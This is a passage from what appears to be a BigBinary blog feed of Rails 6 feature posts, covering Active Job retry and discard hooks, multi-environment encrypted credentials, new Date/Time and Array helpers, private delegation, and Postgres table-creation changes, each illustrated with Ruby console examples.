6.</p><h2>Rails 6</h2><p>Rails 6 has introduced hooks to Active Job<a href="https://github.com/rails/rails/pull/33751">around retries and discards</a> towhich one can easily subscribe using Active Support Instrumentation API toperform custom logging and monitoring or to collect any custom information.</p><p>The newly introduced hooks are <code>enqueue_retry.active_job</code>,<code>retry_stopped.active_job</code> and <code>discard.active_job</code>.</p><p>Let's discuss each of these hooks in detail.</p><p>Note that whenever we say <code>a job</code>, it means a job of type <code>ActiveJob</code>.</p><h5><code>enqueue_retry.active_job</code></h5><p>The <code>enqueue_retry.active_job</code> hook is instrumented when a job is<a href="https://github.com/rails/rails/blob/2ab3751781e34ca4a8d477ba53ff307ae9884b0d/activejob/lib/active_job/exceptions.rb#L119-L123">enqueued to retry again</a>due to occurrence of an exception which is configured using the <code>retry_on</code>method in the job's definition. This hook is triggered only when above conditionis satisfied and the number of executions of the job is less than the number of<code>attempts</code> defined using the <code>retry_on</code> method. The number of <code>attempts</code> is bydefault set to 5 if not defined explicitly.</p><p>This is how we would subscribe to this hook and perform custom logging in ourRails application.</p><pre><code class="language-ruby">ActiveSupport::Notifications.subscribe &quot;enqueue_retry.active_job&quot; do |*args|event = ActiveSupport::Notifications::Event.new *argspayload = event.payloadjob = payload[:job]error = payload[:error]message = &quot;#{job.class} (JID #{job.job_id})with arguments #{job.arguments.join(', ')}will be retried again in #{payload[:wait]}sdue to error '#{error.class} - #{error.message}'.It is executed #{job.executions} times so far.&quot;.squishBackgroundJob::Logger.log(message)end</code></pre><p>Note that the <code>BackgroundJob::Logger</code> above is our custom logger. If we want, wecan add any other logic instead.</p><p>We will change the definition of <code>Container::DeleteJob</code> job as below.</p><pre><code class="language-ruby">class Container::DeleteJob &lt; ActiveJob::Baseretry_on Timeout::Error, wait: 2.seconds, attempts: 3def perform(container_id)Container::DeleteService(container_id).process    # Will raise Timeout::Error when the remote API is not responding.endend</code></pre><p>Let's enqueue this job.</p><pre><code class="language-ruby">Container::DeleteJob.perform_now(&quot;container-1234&quot;)</code></pre><p>Assume that this job keeps throwing <code>Timeout::Error</code> exception due to a networkissue. The job will be retried twice since it is configured to retry when a<code>Timeout::Error</code> exception occurs up to maximum 3 attempts. While retrying thisjob, Active Job will instrument <code>enqueue_retry.active_job</code> hook along with thenecessary job payload.</p><p>Since we have already subscribed to this hook, our subscriber would logsomething like this with the help of <code>BackgroundJob::Logger.log</code>.</p><pre><code class="language-plaintext">Container::DeleteJob (JID 770f4f2a-daa7-4c1e-be51-24adc04b4cb2) with arguments container-1234 will be retried again in 2s due to error 'Timeout::Error - Couldn't establish connection to cluster within 10s'. It is executed 1 times so far.Container::DeleteJob (JID 770f4f2a-daa7-4c1e-be51-24adc04b4cb2) with arguments container-1234 will be retried again in 2s due to error 'Timeout::Error - Couldn't establish connection to cluster within 10s'. It is executed 2 times so far.</code></pre><h5><code>retry_stopped.active_job</code></h5><p>The <code>retry_stopped.active_job</code> hook is triggered when a job is retried<a href="https://github.com/rails/rails/blob/2ab3751781e34ca4a8d477ba53ff307ae9884b0d/activejob/lib/active_job/exceptions.rb#L59-L66">up to the available number of <code>attempts</code></a>.</p><p>Let's see how this hook is triggered.</p><p>Along with the subscription for the <code>enqueue_retry.active_job</code> hook, let'ssubscribe to the <code>retry_stopped.active_job</code> hook, too.</p><pre><code class="language-ruby">ActiveSupport::Notifications.subscribe &quot;retry_stopped.active_job&quot; do |*args|event = ActiveSupport::Notifications::Event.new *argspayload = event.payloadjob = payload[:job]error = payload[:error]message = &quot;Stopped processing #{job.class} (JID #{job.job_id})further with arguments #{job.arguments.join(', ')}since it failed due to '#{error.class} - #{error.message}' errorwhich reoccurred #{job.executions} times.&quot;.squishBackgroundJob::Logger.log(message)end</code></pre><p>Let's keep the <code>Container::DeleteJob</code> job's definition unchanged and enqueue itagain.</p><pre><code class="language-ruby">Container::DeleteJob.perform_now(&quot;container-1234&quot;)</code></pre><p>We will assume that the job will keep throwing <code>Timeout::Error</code> exception due toa network issue.</p><p>In the logs recorded using <code>BackgroundJob::Logger.log</code>, we should see somethinglike this.</p><pre><code class="language-plaintext">Container::DeleteJob (JID 770f4f2a-daa7-4c1e-be51-24adc04b4cb2) with arguments container-1234 will be retried again in 2s due to error 'Timeout::Error - Couldn't establish connection to cluster within 10s'. It is executed 1 times so far.Container::DeleteJob (JID 770f4f2a-daa7-4c1e-be51-24adc04b4cb2) with arguments container-1234 will be retried again in 2s due to error 'Timeout::Error - Couldn't establish connection to cluster within 10s'. It is executed 2 times so far.Stopped processing Container::DeleteJob (JID 770f4f2a-daa7-4c1e-be51-24adc04b4cb2) further with arguments container-1234 since it failed due to 'Timeout::Error - Couldn't establish connection to cluster within 10s' error which reoccurred 3 times.</code></pre><p>Notice the last entry in the logs above and its order.</p><h5><code>discard.active_job</code></h5><p>The <code>discard.active_job</code> hook is triggered when a job's further execution isdiscarded due to occurrence of an exception which is configured using<code>discard_on</code> method.</p><p>To see how this hook is triggered, we will subscribe to the <code>discard.active_job</code>hook.</p><pre><code class="language-ruby">ActiveSupport::Notifications.subscribe &quot;discard.active_job&quot; do |*args|event = ActiveSupport::Notifications::Event.new *argspayload = event.payloadjob = payload[:job]error = payload[:error]message = &quot;Discarded #{job.class} (JID #{job.job_id})with arguments #{job.arguments.join(', ')}due to '#{error.class} - #{error.message}' error.&quot;.squishBackgroundJob::Logger.log(message)end</code></pre><p>We will configure our <code>Container::DeleteJob</code> job to discard when<code>Container::NotFoundError</code> exception occurs while executing the job.</p><pre><code class="language-ruby">class Container::DeleteJob &lt; ActiveJob::Basediscard_on Container::NotFoundErrorretry_on Timeout::Error, wait: 2.seconds, attempts: 3def perform(container_id)Container::DeleteService(container_id).process    # Will raise Container::NotFoundError    # if no container is found with 'container_id'.    # Will raise Timeout::Error when the remote API is not responding.endend</code></pre><p>Let's enqueue this job and assume that it would throw <code>Container::NotFoundError</code>exception.</p><pre><code class="language-ruby">Container::DeleteJob.perform_now(&quot;unknown-container-9876&quot;)</code></pre><p>We should see following in the logs recorded by <code>BackgroundJob::Logger.log</code>.</p><pre><code class="language-plaintext">Discarded Container::DeleteJob (JID e9b1cb5c-6d2d-49ae-b1d7-fef44f09ab8d) with arguments unknown-container-9876 due to 'Container::NotFoundError - Container 'unknown-container-9876' was not found' error.</code></pre><h2>Notes</h2><ol><li><p>These new hooks are also instrumented for the jobs which are enqueued using<code>perform_later</code> method since both <code>perform_now</code> and <code>perform_later</code> calls<code>perform</code> method under the hood.</p></li><li><p>Active Job already subscribes to the these hooks and writes them using the<a href="https://github.com/rails/rails/blob/2ab3751781e34ca4a8d477ba53ff307ae9884b0d/activejob/lib/active_job/logging.rb#L91-L121">Rails' default logger</a>.</p></li><li><p>If a block is provided to <code>retry_on</code> or <code>discard_on</code> methods then anapplicable hook is instrumented first and then the given block is yielded.</p></li></ol>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds support for Multi Environment credentials]]></title>
       <author><name>Berin Larson</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-support-for-multi-environment-credentials"/>
      <updated>2019-07-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-support-for-multi-environment-credentials</id>
      <content type="html"><![CDATA[<p>In Rails 5.2, encrypted credentials are stored in the file<code>config/credentials.yml.enc</code>. This is a single flat file which is encrypted bythe key located in <code>config/master.key</code>.</p><p>Rails 5.2 does not support storing credentials of different environments withdifferent encryption keys. If we want environment specific encryptedcredentials, we'll have to follow<a href="https://github.com/rails/rails/pull/33521#issuecomment-449403068">this workaround</a>.</p><p>Rails 6 has added support for Multi Environment credentials. With this change,credentials that belong to different environments can be stored in separatefiles with their own encryption key.</p><p>Let's see how this works in Rails 6.0.0.beta3</p><h2>Rails 6.0.0.beta3</h2><p>If we want to add credentials to be used in staging environment, we can run</p><pre><code class="language-bash">rails credentials:edit --environment staging</code></pre><p>This will create the credentials file <code>config/credentials/staging.yml.enc</code> and astaging specific encryption key <code>config/credentials/staging.key</code> and open thecredentials file in your text editor.</p><p>Let's add our AWS access key id here.</p><pre><code class="language-yaml">aws:  access_key_id: &quot;STAGING_KEY&quot;</code></pre><p>We can then access the access_key_id in staging environment.</p><pre><code class="language-ruby">&gt;&gt; RAILS_ENV=staging rails cpry(main)&gt; Rails.application.credentials.aws[:access_key_id]=&gt; &quot;STAGING_KEY&quot;</code></pre><h2>Which takes precedence: Global or Environment Specific credentials?</h2><p>Credentials added to global file <code>config/credentials.yml.enc</code><a href="https://github.com/rails/rails/pull/33521#issuecomment-412382031">will not be loaded</a>in environments which have their own environment specific credentials file(<code>config/credentials/$environment.yml.enc</code>).</p><p>So if we decide to add the following to the global credentials file, thesecredentials will not be available in staging. Since we already have aenvironment specific credentials file for staging.</p><pre><code class="language-yaml">aws:  access_key_id: &quot;DEFAULT_KEY&quot;stripe:  secret_key: &quot;DEFAULT_SECRET_KEY&quot;</code></pre><pre><code class="language-ruby">&gt;&gt; RAILS_ENV=staging rails cpry(main)&gt; Rails.application.credentials.aws[:access_key_id]=&gt; &quot;STAGING_KEY&quot;pry(main)&gt; Rails.application.credentials.stripe[:secret_key]Traceback (most recent call last):        1: from (irb):6NoMethodError (undefined method `[]' for nil:NilClass)</code></pre><p>Here is the <a href="https://github.com/rails/rails/pull/33521">relevant pull request</a></p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds before? and after? to Date and Time]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-before-and-after-to-date-and-time"/>
      <updated>2019-06-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-before-and-after-to-date-and-time</id>
      <content type="html"><![CDATA[<p>Rails 6 adds <a href="https://github.com/rails/rails/pull/32185">before?</a> and<a href="https://github.com/rails/rails/pull/32185">after?</a> to<a href="https://api.rubyonrails.org/v5.2/classes/Date.html">Date</a> ,<a href="https://api.rubyonrails.org/v5.2/classes/DateTime.html">DateTime</a> ,<a href="https://api.rubyonrails.org/v5.2/classes/Time.html">Time</a> and<a href="https://api.rubyonrails.org/v5.2/classes/ActiveSupport/TimeWithZone.html">ActiveSupport::TimeWithZone</a>classes.</p><p><a href="https://github.com/rails/rails/pull/32185">before?</a> and<a href="https://github.com/rails/rails/pull/32185">after?</a> are aliases to<a href="https://api.rubyonrails.org/v5.2/classes/Date.html#method-i-3C-3D-3E">&lt; (less than)</a>and<a href="https://api.rubyonrails.org/v5.2/classes/Date.html#method-i-3C-3D-3E">&gt; (greater than)</a>methods respectively.</p><p>Let's checkout how it works.</p><h4>Rails 5.2</h4><p>Let's try calling <code>before?</code> on a date object in Rails 5.2.</p><pre><code class="language-ruby">&gt; &gt; Date.new(2019, 3, 31).before?(Date.new(2019, 4, 1))=&gt; NoMethodError: undefined method 'before?' for Sun, 31 Mar 2019:Datefrom (irb):1&gt; &gt; Date.new(2019, 3, 31) &lt; Date.new(2019, 4, 1)=&gt; true</code></pre><h4>Rails 6.0.0.beta2</h4><p>Now, let's compare <a href="https://api.rubyonrails.org/v5.2/classes/Date.html">Date</a> ,<a href="https://api.rubyonrails.org/v5.2/classes/DateTime.html">DateTime</a> ,<a href="https://api.rubyonrails.org/v5.2/classes/Time.html">Time</a> and<a href="https://api.rubyonrails.org/v5.2/classes/ActiveSupport/TimeWithZone.html">ActiveSupport::TimeWithZone</a>objects using <a href="https://github.com/rails/rails/pull/32185">before?</a> and<a href="https://github.com/rails/rails/pull/32185">after?</a> in Rails 6.</p><pre><code class="language-ruby">&gt; &gt; Date.new(2019, 3, 31).before?(Date.new(2019, 4, 1))=&gt; true&gt; &gt; Date.new(2019, 3, 31).after?(Date.new(2019, 4, 1))=&gt; false&gt; &gt; DateTime.parse('2019-03-31').before?(DateTime.parse('2019-04-01'))=&gt; true&gt; &gt; DateTime.parse('2019-03-31').after?(DateTime.parse('2019-04-01'))=&gt; false&gt; &gt; Time.parse('2019-03-31').before?(Time.parse('2019-04-01'))=&gt; true&gt; &gt; Time.parse('2019-03-31').after?(Time.parse('2019-04-01'))=&gt; false&gt; &gt; ActiveSupport::TimeWithZone.new(Time.utc(2019, 3, 31, 12, 0, 0), ActiveSupport::TimeZone[&quot;Eastern Time (US &amp; Canada)&quot;]).before?(ActiveSupport::TimeWithZone.new(Time.utc(2019, 4, 1, 12, 0, 0), ActiveSupport::TimeZone[&quot;Eastern Time (US &amp; Canada)&quot;]))=&gt; true&gt; &gt; ActiveSupport::TimeWithZone.new(Time.utc(2019, 3, 31, 12, 0, 0), ActiveSupport::TimeZone[&quot;Eastern Time (US &amp; Canada)&quot;]).after?(ActiveSupport::TimeWithZone.new(Time.utc(2019, 4, 1, 12, 0, 0), ActiveSupport::TimeZone[&quot;Eastern Time (US &amp; Canada)&quot;]))=&gt; false</code></pre><p>Here is the relevant <a href="https://github.com/rails/rails/pull/32185">pull request</a>for adding <code>before?</code> and <code>after?</code> methods and the<a href="https://github.com/rails/rails/pull/32398">pull request</a> for moving <code>before?</code>and <code>after?</code> to<a href="https://api.rubyonrails.org/v5.2/classes/DateAndTime/Calculations.html">DateAndTime::Calculations</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds Array#extract!]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-array-extract"/>
      <updated>2019-06-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-array-extract</id>
      <content type="html"><![CDATA[<p>Rails 6 added <a href="https://github.com/rails/rails/pull/33137">extract!</a> on<a href="https://api.rubyonrails.org/v5.2/classes/Array.html">Array</a> class.<a href="https://github.com/rails/rails/pull/33137">extract!</a> removes and returns theelements for which the given block returns true.</p><p><a href="https://github.com/rails/rails/pull/33137">extract!</a> is different from<a href="https://ruby-doc.org/core-2.5.1/Array.html#method-i-reject-21">reject!</a> in theway that<a href="https://ruby-doc.org/core-2.5.1/Array.html#method-i-reject-21">reject!</a> returnsthe array after removing the elements whereas<a href="https://github.com/rails/rails/pull/33137">extract!</a> returns removed elementsfrom the array.</p><p>Let's checkout how it works.</p><h4>Rails 6.0.0.beta2</h4><p>Let's pluck all the user emails and then extract emails which include<code>gmail.com</code>.</p><pre><code class="language-ruby">&gt; &gt; emails = User.pluck(:email)&gt; &gt; SELECT &quot;users&quot;.&quot;email&quot; FROM &quot;users&quot;=&gt; [&quot;amit.choudhary@bigbinary.com&quot;, &quot;amit@gmail.com&quot;, &quot;mark@gmail.com&quot;, &quot;sam@gmail.com&quot;]&gt; &gt; emails.extract! { |email| email.include?('gmail.com') }=&gt; [&quot;amit@gmail.com&quot;, &quot;mark@gmail.com&quot;, &quot;sam@gmail.com&quot;]&gt; &gt; emails=&gt; [&quot;amit.choudhary@bigbinary.com&quot;]&gt; &gt; emails = User.pluck(:email)&gt; &gt; SELECT &quot;users&quot;.&quot;email&quot; FROM &quot;users&quot;=&gt; [&quot;amit.choudhary@bigbinary.com&quot;, &quot;amit@gmail.com&quot;, &quot;mark@gmail.com&quot;, &quot;sam@gmail.com&quot;]&gt; &gt; emails.reject! { |email| email.include?('gmail.com') }=&gt; [&quot;amit.choudhary@bigbinary.com&quot;]&gt; &gt; emails=&gt; [&quot;amit.choudhary@bigbinary.com&quot;]</code></pre><p>Here is the relevant <a href="https://github.com/rails/rails/pull/33137">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds Enumerable#index_with]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-enumerable-index_with"/>
      <updated>2019-06-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-enumerable-index_with</id>
      <content type="html"><![CDATA[<p>Rails 6 added <a href="https://github.com/rails/rails/pull/32523">index_with</a> on<a href="https://api.rubyonrails.org/v5.2/classes/Enumerable.html">Enumerable</a> module.This will help in creating a hash from an enumerator with default or fetchedvalues.</p><p>Before Rails 6, we can achieve this by calling<a href="https://ruby-doc.org/core-2.5.1/Array.html#method-i-map">map</a> along with<a href="https://ruby-doc.org/core-2.5.1/Array.html#method-i-to_h">to_h</a>.</p><p><a href="https://github.com/rails/rails/pull/32523">index_with</a> takes both value or ablock as a parameter.</p><p>Let's checkout how it works.</p><h4>Rails 5.2</h4><p>Let's create a hash from an array in Rails 5.2 using<a href="https://ruby-doc.org/core-2.5.1/Array.html#method-i-map">map</a> and<a href="https://ruby-doc.org/core-2.5.1/Array.html#method-i-to_h">to_h</a>.</p><pre><code class="language-ruby">&gt; &gt; address = Address.first&gt; &gt; SELECT &quot;addresses&quot;.\* FROM &quot;addresses&quot;&gt; &gt; ORDER BY &quot;addresses&quot;.&quot;id&quot; ASC LIMIT \$1 [[&quot;LIMIT&quot;, 1]]=&gt; #&lt;Address id: 1, first_name: &quot;Amit&quot;, last_name: &quot;Choudhary&quot;, state: &quot;California&quot;, created_at: &quot;2019-03-21 10:03:57&quot;, updated_at: &quot;2019-03-21 10:03:57&quot;&gt;&gt; &gt; NAME_ATTRIBUTES = [:first_name, :last_name]=&gt; [:first_name, :last_name]&gt; &gt; NAME_ATTRIBUTES.map { |attr| [attr, address.public_send(attr)] }.to_h=&gt; {:first_name=&gt;&quot;Amit&quot;, :last_name=&gt;&quot;Choudhary&quot;}</code></pre><h4>Rails 6.0.0.beta2</h4><p>Now let's create the same hash from the array using<a href="https://github.com/rails/rails/pull/32523">index_with</a> in Rails 6.</p><pre><code class="language-ruby">&gt; &gt; address = Address.first&gt; &gt; SELECT &quot;addresses&quot;.\* FROM &quot;addresses&quot;&gt; &gt; ORDER BY &quot;addresses&quot;.&quot;id&quot; ASC LIMIT \$1 [[&quot;LIMIT&quot;, 1]]=&gt; #&lt;Address id: 1, first_name: &quot;Amit&quot;, last_name: &quot;Choudhary&quot;, state: &quot;California&quot;, created_at: &quot;2019-03-21 10:02:47&quot;, updated_at: &quot;2019-03-21 10:02:47&quot;&gt;&gt; &gt; NAME_ATTRIBUTES = [:first_name, :last_name]=&gt; [:first_name, :last_name]&gt; &gt; NAME_ATTRIBUTES.index_with { |attr| address.public_send(attr) }=&gt; {:first_name=&gt;&quot;Amit&quot;, :last_name=&gt;&quot;Choudhary&quot;}&gt; &gt; NAME_ATTRIBUTES.index_with('Default')=&gt; {:first_name=&gt;&quot;Default&quot;, :last_name=&gt;&quot;Default&quot;}</code></pre><p>Here is the relevant <a href="https://github.com/rails/rails/pull/32523">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds private option to delegate method]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-private-option-to-delegate-method"/>
      <updated>2019-06-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-private-option-to-delegate-method</id>
      <content type="html"><![CDATA[<p>Rails 6 adds <code>:private</code> option to<a href="https://api.rubyonrails.org/v5.2/classes/Module.html#method-i-delegate">delegate</a>method. After this addition, we can delegate methods in the private scope.</p><p>Let's checkout how it works.</p><h4>Rails 6.0.0.beta2</h4><p>Let's create two models named as <code>Address</code> and <code>Order</code>. Let's also delegate<code>validate_state</code> method in <code>Order</code> to <code>Address</code>.</p><pre><code class="language-ruby">class Address &lt; ApplicationRecord  validates :first_name, :last_name, :state, presence: true  DELIVERABLE_STATES = ['New York']  def validate_state    unless DELIVERABLE_STATES.include?(state)      errors.add(:state, :invalid)    end  endendclass Order &lt; ApplicationRecord  belongs_to :address  delegate :validate_state, to: :addressend&gt;&gt; Order.firstSELECT &quot;orders&quot;.* FROM &quot;orders&quot;ORDER BY &quot;orders&quot;.&quot;id&quot; ASC LIMIT $1  [[&quot;LIMIT&quot;, 1]]=&gt; #&lt;Order id: 1, amount: 0.1e2, address_id: 1, created_at: &quot;2019-03-21 10:02:58&quot;, updated_at: &quot;2019-03-21 10:17:44&quot;&gt;&gt;&gt; Address.firstSELECT &quot;addresses&quot;.* FROM &quot;addresses&quot;ORDER BY &quot;addresses&quot;.&quot;id&quot; ASC LIMIT $1  [[&quot;LIMIT&quot;, 1]]=&gt; #&lt;Address id: 1, first_name: &quot;Amit&quot;, last_name: &quot;Choudhary&quot;, state: &quot;California&quot;, created_at: &quot;2019-03-21 10:02:47&quot;, updated_at: &quot;2019-03-21 10:02:47&quot;&gt;&gt;&gt; Order.first.validate_stateSELECT &quot;orders&quot;.* FROM &quot;orders&quot;ORDER BY &quot;orders&quot;.&quot;id&quot; ASC LIMIT $1  [[&quot;LIMIT&quot;, 1]]SELECT &quot;addresses&quot;.* FROM &quot;addresses&quot;WHERE &quot;addresses&quot;.&quot;id&quot; = $1 LIMIT $2  [[&quot;id&quot;, 1], [&quot;LIMIT&quot;, 1]]=&gt; [&quot;is invalid&quot;]</code></pre><p>Now, let's add <code>private: true</code> to the delegation.</p><pre><code class="language-ruby">class Order &lt; ApplicationRecord  belongs_to :address  delegate :validate_state, to: :address, private: trueend&gt;&gt; Order.first.validate_stateSELECT &quot;orders&quot;.* FROM &quot;orders&quot;ORDER BY &quot;orders&quot;.&quot;id&quot; ASC LIMIT $1  [[&quot;LIMIT&quot;, 1]]=&gt; Traceback (most recent call last):        1: from (irb):7NoMethodError (private method 'validate_state' called for #&lt;Order:0x00007fb9d72fc1f8&gt;Did you mean?  validate)</code></pre><p>As we can see, Rails now raises an exception of private method called if<code>private</code> option is set with <code>delegate</code> method.</p><p>Here is the relevant <a href="https://github.com/rails/rails/pull/31944">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 allows spaces in postgres table names]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-allows-spaces-in-postgres-table-names"/>
      <updated>2019-06-05T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-allows-spaces-in-postgres-table-names</id>
      <content type="html"><![CDATA[<p>Rails 6 allows spaces in tables names in PostgreSQL. Before Rails 6, if we tryto create a table named as <code>user reviews</code>, Rails tries to create a table namedas <code>reviews</code> in schema named as <code>user</code>.</p><p>Let's checkout how it works.</p><h4>Rails 5.2</h4><p>Let's create a table <code>user reviews</code> in Rails 5.2.</p><pre><code class="language-ruby">&gt;&gt; class CreateUserReviews &lt; ActiveRecord::Migration[5.2]&gt;&gt;   def change&gt;&gt;     create_table 'user reviews' do |t|&gt;&gt;       t.string :value&gt;&gt;&gt;&gt;       t.timestamps&gt;&gt;     end&gt;&gt;   end&gt;&gt; end=&gt; :change&gt;&gt; CreateUserReviews.new.change-- create_table(&quot;user reviews&quot;)CREATE TABLE &quot;user&quot;.&quot;reviews&quot; (&quot;id&quot; bigserial primary key, &quot;value&quot; character varying, &quot;created_at&quot; timestamp NOT NULL, &quot;updated_at&quot; timestamp NOT NULL)=&gt; Traceback (most recent call last):        2: from (irb):10        1: from (irb):3:in 'change'ActiveRecord::StatementInvalid (PG::InvalidSchemaName: ERROR:  schema &quot;user&quot; does not exist)LINE 1: CREATE TABLE &quot;user&quot;.&quot;reviews&quot; (&quot;id&quot; bigserial primary key, &quot;...                     ^: CREATE TABLE &quot;user&quot;.&quot;reviews&quot; (&quot;id&quot; bigserial primary key, &quot;value&quot; character varying, &quot;created_at&quot; timestamp NOT NULL, &quot;updated_at&quot; timestamp NOT NULL)</code></pre><p>We can see that Rails 5.2 raised an exception and tried to create table named as<code>reviews</code> in <code>user</code> schema.</p><h4>Rails 6.0.0.beta2</h4><p>Now, let's create a table <code>user reviews</code> in Rails 6.</p><pre><code class="language-ruby">&gt;&gt; class CreateUserReviews &lt; ActiveRecord::Migration[6.0]&gt;&gt;   def change&gt;&gt;     create_table 'user reviews' do |t|&gt;&gt;       t.string :value&gt;&gt;&gt;&gt;       t.timestamps&gt;&gt;     end&gt;&gt;   end&gt;&gt; end=&gt; :change&gt;&gt; CreateUserReviews.new.change-- create_table(&quot;user reviews&quot;)CREATE TABLE &quot;user reviews&quot; (&quot;id&quot; bigserial primary key, &quot;value&quot; character varying, &quot;created_at&quot; timestamp(6) NOT NULL, &quot;updated_at&quot; timestamp(6) NOT NULL)=&gt; #&lt;PG::Result:0x00007f9d633c5458 status=PGRES_COMMAND_OK ntuples=0 nfields=0 cmd_tuples=0&gt;</code></pre><p>Now, we can see that the SQL generated is correct and Rails successfully createda table named as <code>user reviews</code>.</p><p>Here is the relevant <a href="https://github.com/rails/rails/pull/34561">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds if_not_exists option to create_table]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-if_not_exists-option-to-create_table"/>
      <updated>2019-05-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-if_not_exists-option-to-create_table</id>
      <content type="html"><![CDATA[<p>Rails 6 added <a href="https://github.com/rails/rails/pull/31382">if_not_exists</a> to<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-create_table">create_table</a>option to create a table if it doesn't exist.</p><p>Before Rails 6, we could use<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-table_exists-3F">ActiveRecord::Base.connection.table_exists?</a>.</p><p>Default value of <a href="https://github.com/rails/rails/pull/31382">if_not_exists</a>option is <code>false</code>.</p><h4>Rails 5.2</h4><p>Let's create <code>users</code> table in Rails 5.2.</p><pre><code class="language-ruby">&gt;&gt; class CreateUsers &lt; ActiveRecord::Migration[6.0]&gt;&gt;   def change&gt;&gt;     create_table :users do |t|&gt;&gt;       t.string :name, index: { unique: true }&gt;&gt;&gt;&gt;       t.timestamps&gt;&gt;     end&gt;&gt;   end&gt;&gt; end&gt;&gt; CreateUsers.new.change-- create_table(:users)CREATE TABLE &quot;users&quot; (&quot;id&quot; bigserial primary key, &quot;name&quot; character varying, &quot;created_at&quot; timestamp NOT NULL, &quot;updated_at&quot; timestamp NOT NULL)=&gt; #&lt;PG::Result:0x00007fd73e711cf0 status=PGRES_COMMAND_OK ntuples=0 nfields=0 cmd_tuples=0&gt;</code></pre><p>Now let's try creating <code>users</code> table again with<a href="https://github.com/rails/rails/pull/31382">if_not_exists</a> option.</p><pre><code class="language-ruby">&gt;&gt; class CreateUsers &lt; ActiveRecord::Migration[6.0]&gt;&gt;   def change&gt;&gt;     create_table :users, if_not_exists: true do |t|&gt;&gt;       t.string :name, index: { unique: true }&gt;&gt;&gt;&gt;       t.timestamps&gt;&gt;     end&gt;&gt;   end&gt;&gt; end&gt;&gt; CreateUsers.new.change-- create_table(:users, {:if_not_exists=&gt;true})CREATE TABLE &quot;users&quot; (&quot;id&quot; bigserial primary key, &quot;name&quot; character varying, &quot;created_at&quot; timestamp NOT NULL, &quot;updated_at&quot; timestamp NOT NULL)=&gt; Traceback (most recent call last):        2: from (irb):121        1: from (irb):114:in 'change'ActiveRecord::StatementInvalid (PG::DuplicateTable: ERROR:  relation &quot;users&quot; already exists): CREATE TABLE &quot;users&quot; (&quot;id&quot; bigserial primary key, &quot;name&quot; character varying, &quot;created_at&quot; timestamp NOT NULL, &quot;updated_at&quot; timestamp NOT NULL)</code></pre><p>We can see that Rails 5.2 ignored<a href="https://github.com/rails/rails/pull/31382">if_not_exists</a> option and triedcreating the table again.</p><p>Now let's try<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-table_exists-3F">ActiveRecord::Base.connection.table_exists?</a>with Rails 5.2.</p><pre><code class="language-ruby">&gt;&gt; class CreateUsers &lt; ActiveRecord::Migration[5.2]&gt;&gt;   def change&gt;&gt;     unless ActiveRecord::Base.connection.table_exists?('users')&gt;&gt;       create_table :users do |t|&gt;&gt;         t.string :name&gt;&gt;&gt;&gt;         t.timestamps&gt;&gt;       end&gt;&gt;     end&gt;&gt;   end&gt;&gt; end&gt;&gt; CreateUsers.new.change=&gt; nil</code></pre><p>We can see that <code>create_table :users</code> never executed because<code>ActiveRecord::Base.connection.table_exists?('users')</code> returned true.</p><h4>Rails 6.0.0.beta2</h4><p>Let's create <code>users</code> table in Rails 6 with<a href="https://github.com/rails/rails/pull/31382">if_not_exists</a> option set as true.</p><pre><code class="language-ruby">&gt;&gt; class CreateUsers &lt; ActiveRecord::Migration[6.0]&gt;&gt;   def change&gt;&gt;     create_table :users, if_not_exists: true do |t|&gt;&gt;       t.string :name, index: { unique: true }&gt;&gt;&gt;&gt;       t.timestamps&gt;&gt;     end&gt;&gt;   end&gt;&gt; end&gt;&gt; CreateUsers.new.change-- create_table(:users, {:if_not_exists=&gt;true})CREATE TABLE IF NOT EXISTS &quot;users&quot; (&quot;id&quot; bigserial primary key, &quot;name&quot; character varying, &quot;created_at&quot; timestamp(6) NOT NULL, &quot;updated_at&quot; timestamp(6) NOT NULL)=&gt; #&lt;PG::Result:0x00007fc4614fef48 status=PGRES_COMMAND_OK ntuples=0 nfields=0 cmd_tuples=0&gt;&gt;&gt; CreateUsers.new.change-- create_table(:users, {:if_not_exists=&gt;true})CREATE TABLE IF NOT EXISTS &quot;users&quot; (&quot;id&quot; bigserial primary key, &quot;name&quot; character varying, &quot;created_at&quot; timestamp(6) NOT NULL, &quot;updated_at&quot; timestamp(6) NOT NULL)=&gt; #&lt;PG::Result:0x00007fc46513fde0 status=PGRES_COMMAND_OK ntuples=0 nfields=0 cmd_tuples=0&gt;</code></pre><p>We can see that no exception was raised when we tried creating <code>users</code> table thesecond time.</p><p>Now let's see what happens if we set<a href="https://github.com/rails/rails/pull/31382">if_not_exists</a> to false.</p><pre><code class="language-ruby">&gt;&gt; class CreateUsers &lt; ActiveRecord::Migration[6.0]&gt;&gt;   def change&gt;&gt;    